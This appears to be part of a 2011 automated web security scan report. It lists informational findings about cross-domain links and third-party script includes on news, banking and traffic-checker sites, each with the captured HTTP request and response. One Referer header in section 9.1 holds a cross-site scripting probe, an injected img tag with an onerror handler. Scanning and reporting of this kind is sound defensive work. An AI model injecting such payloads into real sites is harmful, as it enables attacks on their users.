8.1. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=AAAAAAAAEEBSuB6F61EMQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAaBkpOgAAAAA.&tt_code=nypost.com&udj=uf%28%27a%27%2C+22407%2C+1317129667%29%3Buf%28%27c%27%2C+133618%2C+1317129667%29%3Buf%28%27r%27%2C+552613%2C+1317129667%29%3Bppv%2815706%2C+%272800731018487898349%27%2C+1317129667%2C+1317388867%2C+133618%2C+25661%29%3B&cnd=!0xxHWwjykwgQpd0hGAAgvcgBMAA425kBQABI2AdQAFgAYHhoAHAGeNrlAoABPIgBuMABkAEBmAEBoAEBqAECsAEAuQEAAAAAAAAQQMEBAAAAAAAAEEDJAYwKeWi8598_2QEAAAAAAADwP-ABAA..&ccd=!BwXkKQjykwgQpd0hGL3IASAA&referrer=http://www.nypost.com&media_subtypes=1&pp=AAABMqsLw59zoXi-X98sGtv-L6HzL-Gqudflhw&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Tue, 14-Sep-2021 13:21:08 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 27 Sep 2011 13:21:08 GMT
Content-Length: 910

document.write('<scr' + 'ipt language=\'javascript\' type=\'text/javascript\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUr
...[SNIP]...
</scr' + 'ipt>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

8.2. http://www.rbcroyalbank.com/products/deposits/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rbcroyalbank.com
Path:   /products/deposits/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/deposits/index.html?tab=student_tab HTTP/1.1
Host: www.rbcroyalbank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.rbcroyalbank.com/personal.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=50.23.123.106-914063840.30178585:lv=1317130069753:ss=1317130069753; stylesheetsetting=null; lastviewed=personal

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:27:58 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 27 Sep 2011 13:27:58 GMT
Content-Type: text/html
Content-Length: 107247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<hea
...[SNIP]...
<p id="globalheader-links"><a href="http://www.rbc.com">RBC.com</a>
...[SNIP]...
</a> | <a lang="en" href="http://www.rbc.com/chinese/canada/"><img src="/uos/_assets/images/header/chinese.gif" alt="Welcome to Canada" border="0" />
...[SNIP]...
</a> | <a href="https://www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&amp;F7=IB&amp;F21=IB&amp;F22=IB&amp;REQUEST=ClientSignin&amp;LANGUAGE=ENGLISH" title="Sign In"><strong>
...[SNIP]...
<span><a href="http://www.rbc.com/investing/index.html">Investing</a>
...[SNIP]...
<span><a href="http://www.rbcwealthmanagement.com/canada.html">Wealth Management</a>
...[SNIP]...
<span><a href="http://www.rbc.com/advice/advice-and-tools.html">Advice &amp; Tools</a>
...[SNIP]...
<noscript>

<a href="http://rbc.bridgetrack.com/a/c/%3FBT_CON=51%26BT_PID=647447"> <img src="https://rbc.bridgetrack.com/a/i/%3FBT_CON%2651%26BT_PID%647447" width="768" height="186" border="0" alt="RBC Advertisement - Click for more Information" /> </a>
...[SNIP]...
<div class="student_tab_title" id="student_tab_title" style="display:none;">
       <img src="http://rbc.bridgetrack.com/event/?type=-1&BTData=602127A746C61705B5D424AB9BEB4AEAC94938495FDF8F5EBEAC5C2DEED1F1C3&BT_PUB=268&BT_VEN=732&BT_TRF=17479&r=[RANDOM]" width="1" height="1" border="0" />
<p><a href="http://rbc.bridgetrack.com/bank/_redir.htm?BTData=602127A746C61705B5D424AB9BEB4AEAC94938495FDF8F5EBEAC5C2DEED1F1C3&BT_TRF=17479"><img src="/products/deposits/_assets-custom/images/RBC_FCP_768x186_EN_july2.jpg" alt="Students WIN^ $1000 Every Day" width="768" height="186" border="0" />
...[SNIP]...
<div class="why_us_tab_title" id="why_us_tab_title" style="display:none;"><a href="http://rbc.bridgetrack.com/a/c/?BT_CON=51&BT_PID=647447"><img src="https://rbc.bridgetrack.com/a/i/?BT_CON=51&BT_PID=647447" width="768" height="186" border="0" alt="RBC Advertisement - Click for more Information" /></a>
...[SNIP]...
<p><a href="http://rbc.bridgetrack.com/bank/_spredir.htm?BTData=6021A7B786679625A534E42B7A1A6ABA4999D9984FCFFF6E3FACBCC4577482&BT_TRF=12659"><img src="/products/deposits/_assets-custom/images/wtc_540X120_bnr_ad_e.jpg" alt="New to Canada? Save money with the RBC Welcome to Canada Package. Learn More &gt;" width="540" height="120" border="0"
...[SNIP]...
<li><a href="http://www.betterstudentlife.ca/Calculator.html" onclick="return popupNewbrowser(this.href)" title="(opens new window)" target="_blank" class="linkedtextandicon"><span>
...[SNIP]...
<li><a href="http://www.betterstudentlife.ca/">Better Student Life</a>
...[SNIP]...
<span><a href="https://www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&amp;F7=IB&amp;F21=IB&amp;F22=HT&amp;REQUEST=IBOnlineEnrollLink&amp;LANGUAGE=ENGLISH&amp;SPAGE=signinenre" onclick="return popupNewbrowser(this.href)" title="Enrol (opens new window)" target="_blank">Enrol</a>
...[SNIP]...
<p>To order cheques for your Royal Credit Line, please contact <a href="http://maps.rbc.com/index.en.asp" onclick="return popupNewbrowser(this.href)" title="Branch and ATM Locator (opens new window)" target="_blank">your branch</a> <a href="http://maps.rbc.com/index.en.asp" onclick="return popupNewbrowser(this.href)" title="Branch and ATM Locator (opens new window)" target="_blank"><img src="/uos/_assets/images/icons/newwindow.gif" alt="RBC U.S. Mortgages (opens new window)" class="icon" />
...[SNIP]...
<img src="/uos/_assets/images/layout/bullet-link.gif" alt="" border="0" class="bullet" /> <a href="http://www.rbc.com/aboutus/awards.html">Learn more</a>
...[SNIP]...
<li><a href="http://maps.rbc.com/index.en.asp">Branch &amp; ATM Locator</a>
...[SNIP]...
<li style="width: 130px;">Visit the <a href="http://www.rbcadvicecentre.com/" style="text-decoration: underline;">RBC Advice Centre</a>
...[SNIP]...
<p><a href="http://www.rbc.com/privacysecurity/ca/" title="Privacy &amp; Security (opens new window)" target="_blank" onclick="return popupNewbrowser(this.href)">Privacy &amp; Security</a> | <a href="http://www.rbc.com/legal/" title="Legal (opens new window)" onclick="return popupHelp(this.href)" target="_blank">Legal</a> | <a href="http://www.rbc.com/accessibility/" title="Accessibility (opens new window)" onclick="return popupNewbrowser(this.href)" target="_blank">Accessibility</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="//stats.royalbank.com/dcs1aoyhb15n6qimq65228u6e_2y7p/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=9.4.0&amp;dcssip=www.rbcroyalbank.com"/></div>
...[SNIP]...

8.3. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplyhired.com
Path:   /a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5?partner=computerworld&stylesheet=http%3A%2F%2Fwww.computerworld.com%2Fresources%2Fsimply-hired-article.css%3F20100409&color_title=%231752A3&color_location=%239c9c9c&color_company=%23656565&header= HTTP/1.1
Host: www.simplyhired.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __utma=270297075.68763.1312579735.1316477965.1316648061.3; __utmz=270297075.1316648061.3.3.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; shua=uafbp%3D8%2Cuaversion%3D2%2Cuajobssearched%3D1316629985%2Cuaexp%3D1; __qca=P0-87527774-1316648061030; shabts=tg141; shup=fvt%3D4e7a2df4

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2011 20:38:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Via: Simply Cache
Content-Length: 7192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html id="html" dir="ltr" xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="http://www.computerworld.com/resources/simply-hired-article.css?20100409" />
</head>
...[SNIP]...
<!-- Start Quantcast tag -->
<img src="http://pixel.quantserve.com/pixel/p-32oLU8PZtWAwo.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
<!-- End Quantcast tag -->
...[SNIP]...

9. Cross-domain script include  previous  next
There are 11 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


9.1. http://www.checksitetraffic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.checksitetraffic.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.checksitetraffic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.checksitetraffic.com/traffic_spy/xss.cxb6540%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E831f05ae54a
Cookie: PHPSESSID=773fc72c0a66e93338f2d43bc9d0dc8d; __utma=11725670.424988600.1317071405.1317071405.1317071405.1; __utmb=11725670.3.10.1317071405; __utmc=11725670; __utmz=11725670.1317071405.1.1.utmcsr=blog.armorize.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 5982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
<
...[SNIP]...
<link rel='stylesheet' type='text/css' href='/css/cst.css' />
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>
<script src="http://sharebar.addthiscdn.com/v1/sharebar.js" type="text/javascript"></script>
...[SNIP]...

9.2. http://www.checksitetraffic.com/traffic_spy/xss.cx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.checksitetraffic.com
Path:   /traffic_spy/xss.cx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /traffic_spy/xss.cx HTTP/1.1
Host: www.checksitetraffic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=b5274bbcfce30657a609a765c232daaa; __utma=11725670.424988600.1317071405.1317071405.1317071405.1; __utmb=11725670.1.10.1317071405; __utmc=11725670; __utmz=11725670.1317071405.1.1.utmcsr=blog.armorize.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 18474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<link rel='stylesheet' type='text/css' href='/css/cst.css' />
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=lam4o"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>
<script src="http://sharebar.addthiscdn.com/v1/sharebar.js" type="text/javascript"></script>
...[SNIP]...

9.3. http://www.checksitetraffic.com/traffic_spy/ziddu.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.checksitetraffic.com
Path:   /traffic_spy/ziddu.com

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /traffic_spy/ziddu.com HTTP/1.1
Host: www.checksitetraffic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.armorize.com/

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 74953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<link rel='stylesheet' type='text/css' href='/css/cst.css' />
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=lam4o"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>
<script src="http://sharebar.addthiscdn.com/v1/sharebar.js" type="text/javascript"></script>
...[SNIP]...

9.4. http://www.nydailynews.com/gossip/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /gossip/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gossip/index.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; Zvents=v8jp7ej93n; zvents_tracker_sid=13171296713740.4048269435297698; tmq=kvqD%3DT; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html; __utma=104774431.1050959437.1317129701.1317129701.1317129701.1; __utmb=104774431.2.10.1317129701; __utmc=104774431; __utmz=104774431.1317129701.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:20:36 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Content-Type: text/html
Content-Language: en
Age: 108
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Tue, 27-Sep-2011 02:16:24 GMT; Path=/
Content-Length: 74175

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<div class="section_mod_content">

<script src="http://player.ooyala.com/player.js?width=658&height=240&embedCode=A3b2dqMjq4rneTiq38Kk98SupKFDC8ET&browserPlacement=right250px"></script>
...[SNIP]...
</style>
<script src="http://widgets.twimg.com/j/1/widget.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=dZiLDGjsGr3O3zacn9QLBk"></script>
...[SNIP]...

9.5. http://www.nydailynews.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:20:49 GMT
Server: Apache
Keep-Alive: timeout=3, max=990
Content-Type: text/html
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 114412

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="/index_rss.xml" />
       <script type="text/javascript" src="http://js.zvents.com/javascripts/zvents_mini_base.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<div id="video-wrapper">
       <script src="http://player.ooyala.com/player.js?width=658&height=240&embedCode=U0eGh5OiEtef9pJy5DHifDLdRY9kWEq6&browserPlacement=right250px"></script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
       <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
<div class="code_module"><script type="text/javascript" src="https://www.civicscience.com/widget/jspoll/?elt=widget1&amp;tgt=146"></script>
...[SNIP]...
<div id="events-box">
<script type="text/javascript" src="http://www.zvents.com/misc/widgets/22084.js?0"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=dZiLDGjsGr3O3zacn9QLBk"></script>
...[SNIP]...

9.6. http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698; __utma=263866259.366694639.1315773952.1315773952.1317129675.2; __utmb=263866259.1.10.1317129675; __utmc=263866259; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvqD%3DT; __vry=0

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:22:10 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Age: 25
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-web-8080=CAACAKAK; Expires=Tue, 27-Sep-2011 02:16:35 GMT; Path=/
Content-Length: 73043

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apikey=2_dEXFuXOH-VmO90DcKM-eUQEGA_6YdnhsIWSKVst63_pUwNak149F4kLoiEZMiaN6"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="art_reshare_indiv">
               <script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://embed.newsinc.com/TopPicks/embed.js?&wid=1961&cid=507&freewheel=90051&sitesection=nydailynews_us_sty&parent=ndn_sliding_launcher"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=dZiLDGjsGr3O3zacn9QLBk"></script>
...[SNIP]...

9.7. http://www.nydailynews.com/static/img/bg-button.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /static/img/bg-button.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /static/img/bg-button.png HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; Zvents=v8jp7ej93n; zvents_tracker_sid=13171296713740.4048269435297698; tmq=kvqD%3DT; __vry=0; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html; __utma=104774431.1050959437.1317129701.1317129701.1317129701.1; __utmb=104774431.2.10.1317129701; __utmc=104774431; __utmz=104774431.1317129701.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Tue, 27 Sep 2011 13:21:29 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
